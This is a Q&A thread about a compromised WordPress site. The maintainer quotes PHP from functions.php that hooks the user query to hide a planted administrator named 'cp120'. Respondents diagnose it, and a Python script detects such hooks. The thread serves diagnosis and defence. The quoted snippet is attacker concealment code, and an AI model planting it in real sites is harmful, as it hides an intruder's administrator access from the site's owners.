-1

I have a client that said they think their site is being hacked. I looked at some stuff and found some suspicious code in their functions.php file. Does anyone recognize any of this and feel it's not right?

add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
    global $current_user;
    $username = $current_user->user_login;
    if ($username == 'admin') {
        global $wpdb;
        $user_search->query_where = str_replace('WHERE 1=1',
            "WHERE 1=1 AND {$wpdb->users}.user_login != 'cp120'",$user_search->query_where);
    }
}
Dave C
  • Hide one admin from another admin: http://wordpress.stackexchange.com/questions/47743/hide-one-admin-from-another-admin – JimL Jul 24 '13 at 21:41
  • That explains it. When you were logged into the site as admin it said there were two admins but only showed one. I wonder how I will make sure this guy is out for good... back doors, no doubt. – Dave C Jul 24 '13 at 21:48
  • If I create a new admin and check that file it immediately puts that code in there again for the new admin username, any idea how that is happening? – Dave C Jul 24 '13 at 21:56
  • Either a hacked admin register/promote function or a shell script. Guessing the first one. I'd do a reinstall. Remove everything (except db) and get a fresh copy of WP. Then check each plugin/extension for known exploits before reinstalling them. Remember to back up files and db, in case something goes wrong and/or you wish to investigate the hack further – JimL Jul 24 '13 at 22:01

1 Answer

1

This code, or similar markup, is sometimes used by WordPress hackers. Once they gain access to your WordPress admin via malicious methods, they create a legitimate admin user and then put this code in your functions.php file so that when you go to your admin user section it only displays 1 user. Here is the trick to see if this has happened to you, in case you are unfamiliar with PHP or don't want to look through a long functions.php file. Go to your admin user area and it will only display the admin users that you know of; however, the number next to admin users will not match the number of displayed users. It will say (4) but only show 3 names.

As a note, this code can be used for legitimate reasons, so make sure if you find this that it wasn't done by your site's admin or developer.

Dave C
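A static check for the pattern discussed in this thread, as an added example (not code from the question or the answer): it scans PHP source for callbacks hooked on `pre_user_query` that rewrite `query_where`, and reports any login they exclude. The function names `function_body` and `find_hidden_users` are my own, and the regex-based parsing assumes string callbacks and balanced braces.

```python
import re

# Sample input: the snippet quoted in the question, embedded so the scan runs offline.
SAMPLE = r'''<?php
add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
global $current_user;
$username = $current_user->user_login;
if ($username == 'admin') {
 global $wpdb;
 $user_search->query_where = str_replace('WHERE 1=1',
   "WHERE 1=1 AND {$wpdb->users}.user_login != 'cp120'",$user_search->query_where);
  }
}
'''

# Callback name registered on the pre_user_query hook (action or filter form).
HOOK = re.compile(r"add_(?:action|filter)\(\s*['\"]pre_user_query['\"]\s*,\s*['\"](\w+)['\"]")
# A login excluded by a "user_login != '...'" or "user_login <> '...'" comparison.
HIDDEN = re.compile(r"user_login\s*(?:!=|<>)\s*\\?['\"]([^'\"\\]+)")

def function_body(src, name):
    """Return the brace-balanced body of PHP function `name`, or '' if absent."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return ""
    depth, i = 1, m.end()
    while i < len(src) and depth:
        # Naive brace counting: assumes braces inside strings are balanced.
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]

def find_hidden_users(src):
    """List (callback, [excluded logins]) for hooks that rewrite query_where."""
    findings = []
    for callback in HOOK.findall(src):
        body = function_body(src, callback)
        if "query_where" in body:
            findings.append((callback, HIDDEN.findall(body)))
    return findings

if __name__ == "__main__":
    for callback, logins in find_hidden_users(SAMPLE):
        print(f"{callback} rewrites the user query; excluded logins: {logins}")
```

A hit only means the user list is being filtered; as the answer notes, confirm with the site's admin or developer whether the filter was put there on purpose.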